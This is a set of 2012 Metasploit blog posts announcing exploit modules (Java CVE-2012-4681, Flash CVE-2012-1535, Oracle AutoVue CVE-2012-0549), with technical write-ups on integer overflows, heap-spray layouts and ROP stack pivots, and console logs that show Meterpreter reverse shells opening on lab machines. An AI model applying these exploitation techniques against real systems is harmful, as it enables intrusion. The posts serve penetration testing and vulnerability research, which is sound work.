Skip navigation
All Places > Metasploit > Blog > 2012 > August
2012

Time to chalk up one more victory for the forces of goodness and light in our struggle against secret 0-day.

 

Java 0-Day Exploit Shipped

 

If you pay any attention at all to the usual security news, you will have certainly already heard about how Accuvant's Josh "jduck" Drake and the Metasploit dev community pounced on the Java 0-Day, aka CVE-2012-4681, aka the Java 7 Applet RCE vulnerability. We shipped this module earlier this week by updating last week's update, mainly so Metasploit Community and Pro users could start testing right away. Of course, it's in this week's normal update as well, and in fact, this version has a much more current description of the bug in light of the ongoing research performed here over the days that followed our initial release.

 

In a moment of foreshadowing, it was last week's blog post where I mentioned that "not everyone can scoop up samples of current malware," when explaining Metasploit's position on offensive security testing. I think this Java exploit is a perfect case in point. If it wasn't for jduck's inspired detective work, followed up by the R&D work in the Metasploit community that lead to this module, we might still be wondering what FireEye was talking about in their cryptic blog post. In other words, this experience just reaffirms to me that open and public exploits beat out secret and private warez kits every time. Today, we all know about the problem, we can all work toward solutions, and in the end, we can shut down this vector months ahead of anyone's schedule.

 

You can check your exposure to this vulnerability right this moment by either downloading Metasploit or checking in on our detection site, IsJavaExploitable.com.

 

Update: Oracle has released Java 7u7 which appears effective against CVE-2012-4681. We're looking at it today to see if there's a bypass.

 

Meterpreter Arp and Netstat

 

In addition to the hoopla around Java, this release also includes two new commands for Meterpreter: netstat and arp. Both are similar to the Unix commands of the same name, providing information about current networking goings on. This kind of thing can be invaluable for figuring out the role of the current machine and for discovering new targets. Thanks to community contributor mephos for sending in the patch.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

On late Sunday night, the Metasploit Exploit team was looking for kicks, and heard the word on the street that someone was passing around a reliable Java 0-day exploit. Big thanks to Joshua J. Drake (jduck), we got our hands on that PoC, and then once again, started our voodoo ritual. Within a couple of hours, we have a working exploit. Download Metasploit here, and apply the latest update to pick up the exploit.

 

Java zero-day vulnerability exploit in Metasploit

 

The above example is a successful attack against a fully patched Windows 7 SP1 with Java 7 Update 6.  We have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safari on OS X 10.7.4

 

As a user, you should take this problem seriously, because there is currently no patch from Oracle.  For now, our recommendation is to completely disable Java until a fix is available.  NOTE: A fix is now available (Java 7 Update 7), please patch your system ASAP!

 

To try out this exploit: Get your free Metasploit download now, or update your existing installation.  Meanwhile, we will keep this blog updated when more progress has been made.

 

---

Aug 28 2012: This vulnerability has been assigned as CVE-2012-4681.

Aug 30 2012: Oracle has released Java 7 Update 7

After the last couple bumper crops of exploits, having merely six new modules this week is kind of a relief, at least from an editing standpoint. Of course, one of them is for a fresh Adobe Flash exploit, so let's jump into that.

 

Flash Malware Module

 

This week's update features an exploit for Adobe Flash, which Metasploit exploit developers Wei "sinn3r" Chen and Juan Vazquez wrote about last week. Since that blog post, there's been a few updates to add in more valid targets -- the current version should successfully exploit unpatched systems running Internet Explorer 6, 7, 8, and 9, tested across Windows XP SP3, Vista SP2, and Windows 7 SP1.

 

This variety of targets Metasploit provides is one reason why the work sinn3r and Juan do in porting live malware to Metasploit modules is so critical. Let's say you're running an IT department and you don't have complete control over the desktops in your network -- which is of course pretty much every network, not running hyper-secure NAC. Since you can't patch everyone, you might rely on anti-virus (AV), intrusion protection (IPS), or application proxies to protect your constituents from getting nailed by the original exploit. However, it's difficult to know if these defenses are any good at all against variants -- in other words, you generally can't know if your AV/IPS/Proxy is merely "covering the exploit," or if they're "covering the vulnerability." With the Metapsloit exploit and its varied targets, you can test your own defensive gear pretty rapidly.

 

Incidentally, not everyone can scoop up samples of current malware, and nor is it advisable to go monkeying around with known-evil code without doing a lot of prep work first. In that vein, using Metasploit exploits as a proxy for the bad guys turns out to be way more convenient, not to mention about a million times safer. Go offensive security!

 

HTTP Client Trickery

 

Speaking of testing your own environment, this update also has a couple new auxiliary modules that can facilitate testing your users on their password management skills. The first, HTTP Client Basic Authentication Credential Collector by community contributor "saint patrick," is a pretty straight forward credential collector -- it simulates a web server that asks for a username and password. You'd be surprised at how often people will just start typing in a username/password combination when given the opportunity. Of course, if you're a cynical IT security hack, you won't be surprised at all.

 

The other is an HTTP Client MS Credential Relayer by community contributor Rich Lundeen. This attack is a little more involved: after picking up a set of credentials over HTTP, this module gives you the capability to turn around and immediately replay them against either another HTTP server or an SMB server. This attack isn't new, but bringing this implementation to Metasploit in a modular way is great news.

 

Thanks to both of you guys for your unconnected-but-related work this week!

 

Extending JBOSS Targets

 

Finally, this week sees the culmination of a bunch of work from community contributor h0ng10 in improving Metasploit's support for targeting JBoss application servers. You can read the storied details and testing that happened along the way on on Pull Request #663 , but the end result is, we now have Meterpreter payload support for all three of our current JBoss exploits. That's pretty sweet, so thanks for your work on this, h0ng10!

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Auxiliary modules

 

Exploit modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Have you ever wanted to run an exploit but found yourself away from your desk? Wouldn't it be awesome if you could launch a full version of the Metasploit Framework from your phone or tablet? As you might have guessed, now you can. With an adventurous spirit and a few commands, you can be running the Metasploit Framework on your iPad or iPhone in just a few short minutes.

 

Warning: To install Metasploit, you’ll need root access to your device – which is accomplished by following your favorite jailbreaking procedure. I used Absinthe (http://absinthejailbreak.com/). Jailbreaking can potentially cause problems for you and your device, and will void the warranty. You assume all risk when altering your device(s). However, if you are installing Metasploit, you probably already enjoy breaking things. :-)

 

Once you have root, you will need the following:

  • OpenSSH server (via Cydia)
  • apt [APT 0.7+ Strict] (via Cydia)
  • SSH client (I use iSSH; via App Store)

 

First, make sure everything is updated and that you have subversion installed:


apt-get update

apt-get dist-upgrade

apt-get install wget subversion

 

IMAGE1.PNG

 

Once that’s done, we’ll need to grab Ruby and iOS dependencies for Metasploit Framework to run. As of this writing, the files needed were kindly hosted over at iNinjas:

 

wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb

wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb

wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

 

IMAGE2.PNG

Install the packages:


dpkg -i iconv_1.14-1_iphoneos-arm.deb

dpkg -i zlib_1.2.3-1_iphoneos-arm.deb

dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

 

Once the dependencies have finished installing, you can safely delete those files to save space on your iDevice. Presuming these are the only .deb files you have downloaded, you can run rm -rf *.deb. If you’ve been tinkering around with other files, just replace the * with the file names you want to remove.

 

If you want to double-check everything installed correctly, you should be able to see Ruby version 1.9.2 by running the ruby –v command.

IMAGE3.PNG

 

Now the good part! I installed Metasploit Framework to /private/var/msf3. In case you are unfamiliar, /private/var is the partition where your apps, media and settings are all stored by default, so it’s easily the larger of the two default partitions on your iDevice.

 

We’re going to use svn to grab the Metasploit Framework trunk for the sake of simplicity and compatibility issues:

 

cd /private/var

svn co https://www.metasploit.com/svn/framework3/trunk/ msf3

 

IMAGE4.PNG

 

Once that’s done, cd to msf/ and launch the Metasploit Framework!

 

ruby msfconsole

 

Happy exploiting!

 

IMAGE5.PNG

 

---

Co-written/Developed by Andrew Spangler and James Kirk

Edit: Aug 26 2012.


Recently, a new Adobe Flash vulnerability (CVE-2012-1535) was being exploited in the wild as a zero-day in limited targeted attacks, in the form of a Word document.  The Metasploit team managed to get our hands on the malware sample, and began our voodoo ritual in order to make this exploit available in the Metasploit Framework.  Although Adobe officially has already released a patch (APSB12-18), and that the malware is pretty well documented, the vulnerability itself isn't (well, at least not in English) -- we figured it's time to update the blog.


When we began analyzing the the malicious Flash object file, we realized the vulnerability should be related to the parsing of the embedded font file because of the following source code:


public function TextBlock_createTextLineExample():void{
  var _local1 = "Edit the world in hex.";
  var _local2:FontDescription = new FontDescription("PSpop");
  _local2.fontLookup = FontLookup.EMBEDDED_CFF;
  var _local3:ElementFormat = new ElementFormat(_local2);
  _local3.fontSize = 16;
  var _local4:TextElement = new TextElement(_local1, _local3);
  var _local5:TextBlock = new TextBlock();
  _local5.content = _local4;
  this.createLines(_local5);
}


private function createLines(_arg1:TextBlock):void{
  var _local2:Number = 300;
  var _local3:Number = 15;
  var _local4:Number = 20;
  var _local5:TextLine = _arg1.createTextLine(null, _local2);
  while (_local5) {
  _local5.x = _local3;
  _local5.y = _local4;
  _local4 = (_local4 + (_local5.height + 2));
  addChild(_local5);
  _local5 = _arg1.createTextLine(_local5, _local2);
  };
}


When this font file is loaded, we trigger a clean crash similar to the following:


(538.7dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash32_11_3_300_268.ocx -
eax=1e0d0000 ebx=1e0cfff0 ecx=000004f7 edx=00000000 esi=02a7dfa0 edi=02a78250
eip=1044168a esp=0013dd20 ebp=0013dd58 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050206
Flash32_11_3_300_268!DllUnregisterServer+0x285c28:
1044168a ff5008          call    dword ptr [eax+8]    ds:0023:1e0d0008=????????


A quick look in IDA Pro reveals EAX comes from arg_0:


.text:103EF2D0                mov    esi, [esp+4+arg_0] <-- ESI read from arg_0
.text:103EF2D4                test    esi, esi
.text:103EF2D6                jz      short loc_103EF2EB
.text:103EF2D8                push    dword ptr [esi+0Ch]
.text:103EF2DB                mov    eax, [esi]        <-- EAX read from ESI
.text:103EF2DD                push    eax
.text:103EF2DE                call    dword ptr [eax+8]  <-- Crash

 

And a quick cross-reference brings us to this particular call:

 

Down p sub_103EF4A0+19B call    sub_103EF2CF    ; Call crashing function

 

Where sub_103EF4A0+19B  points to the following:

 

.text:103EF63A loc_103EF63A:                          ; CODE XREF: sub_103EF4A0+A3 j
.text:103EF63A                push    esi
.text:103EF63B                call    sub_103EF2CF    ; Call crashing function

 

At this point, we know there is some kind of corruption in ESI... but what's ESI for?  Here, we trace ESI by first "decompiling" the entire function, and then grep 'v6' (ESI):


$ grep -n v6 sub_103ef4a0.txt
6:  int v6; // esi@6
43:    v6 = (*a1)(a1, 16);
44:    v16 = v6;
45:    if ( !v6 )
50:    *(v6 + 8) = streama;
51:    *v6 = a1;
52:    *(v6 + 4) = v3;
54:    *(v6 + 12) = v7;
59:      sub_103EF2CF(v6);    


As you can see, at line 43, ESI is assigned with a value.  Turns out this is a when the function allocates memory (that we later discovered as the kern table memory):


.text:103EF4ED loc_103EF4ED:                          ; CODE XREF: sub_103EF4A0+37 j
.text:103EF4ED                pop    ebx
.text:103EF4EE                cmp    [ebp+stream], esi
.text:103EF4F1                jz      loc_103EF655
.text:103EF4F7                mov    eax, [ebp+arg_0]
.text:103EF4FA                push    10h
.text:103EF4FC                push    eax
.text:103EF4FD                call    dword ptr [eax] ; Allocate memory
.text:103EF4FF                mov    esi, eax


We will call the above "memory 1", because there's another one ("memory 2") that comes pretty much right after:


.text:103EF514 loc_103EF514:                            ; CODE XREF: sub_103EF4A0+68 j
.text:103EF514                mov    eax, [ebp+stream]
.text:103EF517                mov    ecx, [ebp+arg_0]  ;[arg_0] is our allocator
.text:103EF51A                mov    [esi+8], eax
.text:103EF51D                shl    eax, 4
.text:103EF520                push    eax
.text:103EF521                push    ecx
.text:103EF522                mov    [esi], ecx
.text:103EF524                mov    [esi+4], edi
.text:103EF527                call    dword ptr [ecx]
.text:103EF529                pop    ecx
.text:103EF52A                pop    ecx
.text:103EF52B                xor    ecx, ecx
.text:103EF52D                mov    [esi+0Ch], eax


In the above code, EAX is an user-controlled value, and is used as size.  In our case, this value is always 0x10000000, and when the code does a "SHL EAX, 4", EAX will become 0x00 -- an integer overflow.  Here's an experiment you can try in IRB and demonstrates the same purpose:


ruby-1.9.2-p180 :006 > [0x10000000 << 4].pack("V*").unpack("H*")
=> ["00000000"]

 

Again, since 0x10000000 is user-controlled, we need to find out where it comes from.  We know that the crash occurs when the font is loaded, so we'll begin searching there:


$ d3v_binary_search.rb -i PSPop.otf -p 10000000 |grep HERE
00007800  00 02 00 09 00 03 00 09 00 00 00 10 00 00 00 10  |................|     


The first offset (around 0x7800) doesn't seem to point to anything interesting.  But the second one (0x8340), according to our TFF template with 010 Editor, shows that it falls into the "kern" header section:

 

struct tTable Table[8]kern (1801810542) at 33604 for 15852
ULONG checkSumA466AE58h
ULONG offset8344h
ULONG length3DECh


According to the TFF specifications, the 'kern' header has the following values:

 

TypeNameDescription
fixed32versionThe version number of the kerning table (0x00010000 for the current version).
uint32nTablesThe number of subtables included in the kerning table.


So at around 0x8340, here's how we should interpret the binary data:


$ cat PSPop.otf |hexdump -C |grep 00008340
00008340  00 00 00 00 00 01 00 00  10 00 00 00 1e 0c ff e8  |................|
                         ^Version  ^ nTables

 

At this point, we understand that when the version is 0x10000, and that when nTables has a value of 0x10000000 or higher, an integer overflow occurs for memory 2.  With a little bit of clever breakpoints, we learned that memory 2 is always allocated before memory 1.  And a before/after memory dump comparison reveals the overflow:

 

Memory 2:

 

LocationBeforeAfter

0x03a69058

0x03a6906a

0x03a6907c

0x03a6908e

0x03a690a0

54 90 A6 03 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 08 00 00 00 08 00 00 00 00 00 00 00 00

00 00 F0 FF 0C 1E 00 00 0D 1E FF FF FF FF 00 00 00

F0 FF 0C 1E 00 00 0D 1E FF FF FF FF 00 00 00 00 F0

0C 1E 00 00 0D 1E FF FF FF FF 00 00 00 00 F0 FF 0C

00 00 0D 1E FF FF FF FF 00 00 00 00 F0 FF 0C 1E 00

 

Memory 1 -- Notice the first two rows are overwritten, with the first 4 bytes being the pointer to our shellcode:

 

LocationBeforeAfter

03a6d750

03a6d762

03a6d774

03a6d786

03a6d798

B0 C1 A6 03 50 82 A6 03 00 00 00 10 00 00 00 00 70

A6 03 2E 31 2E 33 00 00 00 00 00 00 00 00 B0 D7 A6

50 D1 A6 03 80 D8 A6 03 00 00 00 00 2F 6E 54 41 48

2E 74 78 74 2E 73 77 66 00 00 38 4F AA 03 80 D8 A6

00 00 00 00 00 00 00 00 c0 D6 A6 03 00 00 00 00 00

00 00 0d 1E FF FF FF FF 00 00 00 00 F0 FF 0C 1E 00

0d 1E FF FF FF FF 00 00 00 00 00 00 00 00 B0 D7 A6

50 D1 A6 03 80 D8 A6 03 00 00 00 00 2F 6E 54 41 48

2E 74 78 74 2E 73 77 66 00 00 38 4F FF 03 80 D8 A6

00 00 00 00 00 00 00 00 C0 D6 A6 03 00 00 00 00 00

 

Eventually, ESI points to 0x03a6d750, and when the following executes, we gain code execution:

 

.text:103EF2DB                mov    eax, [esi]  ;0x03A6D750
.text:103EF2DD                push    eax
.text:103EF2DE                call    dword ptr [eax+8]

 

Unlike the original malware, the Metasploit module for CVE-2012-1535 delivers the attack as a browser exploit.  And it currently supports Internet Explorer 6/7/8/9, Windows XP SP3 all the way to Windows 7 SP1.  It specifically has ROP chains (in order to bypass Data Execution Prevention) for the following Flash builds under XP, otherwise it defaults to JRE ROP as "plan B":

 

  • Flash 11.3.300.268
  • Flash 11.3.300.265
  • Flash 11.3.300.257

 

And here's an example of a successful assault against Windows 7 SP1:

 

msf  exploit(adobe_flash_otf_font) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.255.78:4444 
msf  exploit(adobe_flash_otf_font) > [*] Using URL: http://0.0.0.0:8080/xF
[*]  Local IP: http://10.6.255.78:8080/xF
[*] Server started.
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /xF
[*] 10.6.255.89      adobe_flash_otf_font - Sending HTML
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /HjSwC.txt.swf
[*] 10.6.255.89      adobe_flash_otf_font - Sending SWF
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /HjSwC.txt
[*] 10.6.255.89      adobe_flash_otf_font - Default back to JRE ROP
[*] 10.6.255.89      adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.6.255.89
[*] Meterpreter session 1 opened (10.6.255.78:4444 -> 10.6.255.89:49170) at 2012-08-22 15:28:26 -0500
[*] Session ID 1 (10.6.255.78:4444 -> 10.6.255.89:49170) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1216)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2380
[+] Successfully migrated to process

 

 

To try out this exploit: Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions. In the meanwhile, we keep working further into this!


sinn3r & juan

Another week, another fifteen new modules for Metasploit. I continue to be amazed by the productivity of our open source exploit developer community. Thanks so much for your hard work and effort, folks!

 

New Module for Trusted Path Switcheroo

 

As I was going over this week's new modules, one that jumped out at me was Wei "sinn3r" Chen's implementation of a general Trusted Path insertion attack, Windows Service Trusted Path Privilege Escalation. I don't recall running into this attack scenario before, but of course, I don't live and breathe the Windows APIs like sinn3r does. Here's how it works, in a nutshell:

 

  • First, find a Windows service that is run in the context of LocalSystem.
  • Of those, find a service executable is in an unquoted directory path that contains a space. For example, if a system service runs C:\Program Files\FooCompany\bar.exe (without specifying quotes), you're in.
  • Write your malicious executable to a path that mimics the path specifier up until the first space, and launch the service as normal.  In the above example, we'd write our executable to C:\Program.exe, so it will be run with the command argument of "Files\FooCompany\bar.exe"

 

That's pretty much the long and the short of it. Of course, you need the rights to both write to (perhaps) an arbitrary directory and the rights to start and stop services, but Power Users (and better) tend to have those rights by default. If you want to check the paths of all your running Windows processes, the easiest way is probably just firing up a command shell, and running "wmic PROCESS get CommandLine" and eyeballing that for anything missing quotes.

 

Stack Cookie Bypass Technique

 

Metasploit exploit developer Juan Vazquez brings us another technical deep-dive into his strategies for bypassing stack cookie protections that he used to exploit CVE-2012-0549 in his module Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow. If you are just getting started in exploit development on your own, Juan's blog posts have been a treasure trove of practical, hands-on wisdom.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Auxiliary modules

 

Exploit modules

 

Post modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

In this blog post we would like to share some details about the Oracle AutoVue exploit for CVE-2012-0549 which we've recently added to the Metasploit Framework.  This module exploits a buffer overflow flaw, discovered by Brian Gorenc.

 

The problem arises when you call the SetMarkupMode function from the AutoVue control (clsid B6FCC215-D303-11D1-BC6C-0000C078797F) with a long sMarkup parameter. The buffer overflow, even when triggered through an API from the AutoVue control, happens in AvMarkupX (AVMRkpX.ocx), where Safe for Script and Safe for Init flags are set to false. The buffer overflow is due to the insecure usage of an strcpy-like function using the controlled sMarkup parameter as source, and a fixed length stack buffer as destination:

 

.text:100123C5                 mov     ecx, edi
.text:100123C7                 call    ds:mfc90_910    ; call mfc90!CProperty::GetID
.text:100123CD                 push    eax             ; controlled data through the sMarkup parameter from SetMarkupMode
.text:100123CE                 lea     eax, [esp+44Ch+vulnerable_buffer_var_414]
.text:100123D2                 push    eax
.text:100123D3                 call    PanStrcpy

 

 

The PanStrcpy function is exported by the panio.dll DLL, it's just an strcpy implementation where contents are copied from the area pointed by source to destination, until a null byte is found, without having lenghts into account:

 

int __stdcall PanStrcpy(int dst_arg_0, int src_arg_4)
{
  int v2; // ecx@1
  int result; // eax@1
  char v4; // dl@5

  v2 = src_arg_4;
  result = dst_arg_0;
  if ( src_arg_4 )
  {
    if ( dst_arg_0 )
    {
      do
      {
        v4 = *(_BYTE *)v2;
        *(_BYTE *)(dst_arg_0 - src_arg_4 + v2) = *(_BYTE *)v2;
        ++v2;
      }
      while ( v4 );
    }
  }
  else if ( dst_arg_0 )
  {
    *(_BYTE *)dst_arg_0 = 0;
  }
  return result;
}

















Stack Cookies Bypass

 

While the vulnerability is straight-forward to understand, exploitation is a little more tricky because the vulnerable function is protected by stack cookie, checked before the ret:

 

.text:1001246A                 mov     ecx, [esp+438h+var_10]
.text:10012471                 xor     ecx, esp
.text:10012473                 call    @__security_check_cookie@4 ; __security_check_cookie(x)
.text:10012478                 add     esp, 438h
.text:1001247E                 retn    8

 

In a case like this, SEH overwrite could be a first standard solution for the exploit. But this time the overwritten data in the stack is used in an interesting way, between the overflow and the check of the stack cookie, that can be used to get control of EIP.

 

Just before the stack cookie check, a call to the mfc90!CMFCRestoredTabInfo::~CMFCRestoredTabInfo destructor succeeds:

 

.text:10012449                 lea     ecx, [esp+448h+arg_4]
.text:10012450                 call    ds:mfc90_601    ; call  mfc90!CMFCRestoredTabInfo::~CMFCRestoredTabInfo

 

Because of the overflow the "this" pointer (ecx) can be controlled when calling CMFCRestoredTabInfo::~CMFCRestoredTabInfo. So, we are going to check what happens to this function -- first of all a CStringData from the object is going to be released:

 

.text:786E63B6 ; void __thiscall ATL__CSimpleStringT_char_1____CSimpleStringT_char_1_(ATL::CStringT > > *this)
.text:786E63B6 this = ecx
.text:786E63B6                 mov     eax, [this]     ; mfc90_598
.text:786E63B6                                         ; mfc90_599
.text:786E63B6                                         ; mfc90_600
.text:786E63B8                 sub     eax, 10h
.text:786E63BB                 jmp     ?Release@CStringData@ATL@@QAEXXZ ; ATL::CStringData::Release(void)
.text:786E63BB ??1?$CSimpleStringT@D$00@ATL@@QAE@XZ endp

 

Since we control the this pointer, we can control the CStringData pointer to be released, so we can go forward and take a look at CStringData::Release. First part of the function seems to retrieve a (reference?) counter from the CStringData and decrement it:

 

.text:7862FBA4 ; void __thiscall ATL__CStringData__Release(ATL::CStringData *this)
.text:7862FBA4                                         ; CODE XREF: CRuntimeClass::CreateObject(wchar_t const *)+31 p
.text:7862FBA4                                         ; CRuntimeClass::FromName(wchar_t const *)+27 p ...
.text:7862FBA4 this = eax
.text:7862FBA4                 lea     ecx, [this+0Ch]
.text:7862FBA7                 or      edx, 0FFFFFFFFh
.text:7862FBAA                 lock xadd [ecx], edx
.text:7862FBAE                 dec     edx
.text:7862FBAF                 test    edx, edx
.text:7862FBB1                 jg      short locret_7862FBBB

 

After the decrement, if the counter is 0, the next block of code is reached which allows to control a dynamic call:

 

.text:7862FBB3                 mov     ecx, [this]
.text:7862FBB5                 mov     edx, [ecx]
.text:7862FBB7                 push    this
.text:7862FBB8                 call    dword ptr [edx+4]

 

Remember, we control the CMFCRestoredTabInfo pointer. Therefore if we make it point to a memory region where contents can be user-controlled (via heap spray as sample), so will the CStringData pointer and its reference counter, and finally the virtual function pointer.

 

In order to achieve exploitation in the easiest case (no DEP, no ASLR), the CMFCRestoredTabInfo pointer can be overwritten with the well known 0x0c0c0c0c and a specially crafted heap spray can be easily built in order to get the next layout:

 

AddressContentComment
0x0c0c0bfc0c0c0c0cCStringData this pointer
0x0c0c0c081CStringData reference counter
0x0c0c0c0c0c0c0c0cCMFCRestoredTabInfo this pointer
0x0c0c0c100c0c0c0cCStringData virtual function pointer

 

In order to bypass DEP (and ASLR) the well known ROP chain from msvcr71.dll of Java 6 is used, in that case a little different layout is needed:

 

AddressContentComment
0x0c0c0bfc0c0c0c0cCStringData this pointer
0x0c0c0c081CStringData reference counter
0x0c0c0c0c0c0c0c0cCMFCRestoredTabInfo this pointer
0x0c0c0c100x7c341ae4 (First Stack Pivot)CStringData virtual function pointer

 

Once the control is transfered to the first StackPivot, it fixes ESP to point to the controlled sMarkup data on the stack:

 

 

AddressGadget
0x7c341ae4

ADD ESP, 48

RETN


Where a second stack pivot is located to finally transfer code to the rop chain on the HEAP, after our specially crafted layout:

 

 

AddresGadgetPurpose
0x7c3522ca

ADD EAX,20

RETN

EAX stores the CStringData pointer, where a specially crafted object has been placed get EIP control.

Because of this an offset (0x20) is added, to point to clean controlled data.

It's the reason to use a two stage stack pivoting.

0x7c348b05

XCHG EAX,ESP

RETN

Redirect ESP to the heap, where the ROP chain plus the shellcode have been placed via heap spray.


And then of course, we finish off the vulnerability with a shell:

 

 

  
msf > use exploit/windows/browser/oracle_autovue_setmarkupmode
msf  exploit(oracle_autovue_setmarkupmode) > show options

Module options (exploit/windows/browser/oracle_autovue_setmarkupmode):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(oracle_autovue_setmarkupmode) > set OBFUSCATE true
OBFUSCATE => true
msf  exploit(oracle_autovue_setmarkupmode) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/BqDGljqonJalxvs
[*]  Local IP: http://192.168.1.128:8080/BqDGljqonJalxvs
[*] Server started.
msf  exploit(oracle_autovue_setmarkupmode) > [*] 192.168.1.151    oracle_autovue_setmarkupmode - User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.151    oracle_autovue_setmarkupmode - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.151
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.151:49165) at 2012-08-06 08:41:58 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.151:49165) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3816
[+] Successfully migrated to process 

msf  exploit(oracle_autovue_setmarkupmode) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.1.128:4444 -> 192.168.1.151:49165 (192.168.1.151)

msf  exploit(oracle_autovue_setmarkupmode) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

 

Exploit Database (DB)

Each month we use the exploit database (DB) to compile a list of the top 10 most searched exploit and auxiliary modules from Metasploit. The data base analyzes searches conducted on Metasploit.com from the webserver's logs. (We do not track actual Metasploit usage to preserve users' privacy.)

 

This month's list has the top 5 hanging strong from last month, with three new additions coming in at numbers 8, 9, and 10. Tod Beardsley broke down the top 10 to give some valuable insight into the exploits.

 

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Same position as last month.

  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Same position as last month.

